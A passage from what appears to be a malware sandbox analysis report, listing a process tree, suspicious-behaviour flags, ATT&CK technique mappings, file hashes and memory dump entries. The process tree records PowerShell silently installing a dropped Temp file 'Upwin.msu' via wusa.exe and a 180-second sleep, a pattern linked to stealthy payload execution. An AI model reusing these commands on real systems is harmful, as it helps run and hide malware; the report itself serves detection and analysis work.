    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2352
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3fc5a5c9e94a0fb27e6b837b06bd3831

SHA1
d0911a9192658ed1dbfaa77395b6cef76050f81a

SHA256
315c3ea6c42b8657a6831e73a57dbf3ce004f653aeaaa2014e2131853fc384cd

SHA512
16be47fff0ef2fb8d675071036a24e10e038a5f3d2eb027620f3bdbdbc13ee190e996b1413fcb1dfd3627a56218095bd1d67ca0e8d4098a3e4509a8f414e80e7

Download Submit
memory/2136-4-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp

Filesize
4KB

Download
memory/2136-7-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-6-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/2136-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2136-10-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-9-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-8-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-11-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-29-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp

Filesize
4KB

Download
memory/2136-30-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing